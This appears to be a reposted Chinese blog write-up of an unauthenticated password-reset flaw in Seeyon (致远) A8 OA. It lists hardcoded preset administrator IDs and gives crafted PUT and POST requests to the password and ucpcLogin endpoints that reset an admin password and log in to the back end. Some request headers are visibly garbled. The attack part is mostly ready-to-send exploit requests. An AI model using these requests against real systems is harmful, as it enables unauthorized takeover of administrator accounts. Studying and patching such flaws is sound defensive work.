致远A8 存在密码重置漏洞,未授权的攻击者在知道用户名的情况下,可以构造特制的请求包,从而修改用户密码,登录系统后台。
根据致远的手册可知,管理员的预制id
/**
* 系统管理员预置ID
* @deprecated 角色角色化后,废弃不再使用
*/
public static final Long SYSTEM_ADMIN_ID = -7273032013234748168L;
/**
* 审计管理员预置ID
* @deprecated 角色角色化后,废弃不再使用,8.1后可能删除
*/
public static final Long AUDIT_ADMIN_ID = -4401606663639775639L;
/**
* 集团管理员预置ID
* @deprecated 角色角色化后,废弃不再使用,8.1后可能删除
*/
public static final Long GROUP_ADMIN_ID = 5725175934914479521L;
构造根据预制id数据包获取登录名
PUT /seeyon/rest/orgMember/-7273032013234748168/password/share.do HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0 :
Accept: */*
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 :
gzip, deflate, br :
Connection: close
Cookie: JSESSIONID=3891CB3E3CA435C599001E4F03A335B0; loginPageURL=
构造数据包更改密码
POST /seeyon/rest/authentication/ucpcLogin?login_username=system&login_password=share.do&ticket=
成功登录
原文始发于微信公众号(丁永博的成长日记):致远OA ucpcLogin密码重置漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论